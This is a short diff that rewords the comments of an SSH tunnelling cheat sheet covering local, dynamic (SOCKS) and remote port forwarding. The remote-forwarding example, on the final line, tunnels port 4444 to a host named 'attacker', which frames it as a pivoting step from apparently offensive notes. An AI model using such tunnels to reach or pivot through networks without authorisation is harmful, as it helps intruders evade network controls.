 SSH Tunnelling

-# Local port forwarding — forward remote service to local port
+# Local port forwarding — access an internal service via your local machine

 ssh -L 8080:192.168.1.10:80 user@jumphost

-# Dynamic port forwarding — SOCKS proxy through SSH
+# Dynamic port forwarding — create a SOCKS proxy through SSH

 ssh -D 1080 user@jumphost

-# Remote port forwarding — expose local port on remote host
+# Remote port forwarding — expose your local listener on the remote host

 ssh -R 4444:localhost:4444 user@attacker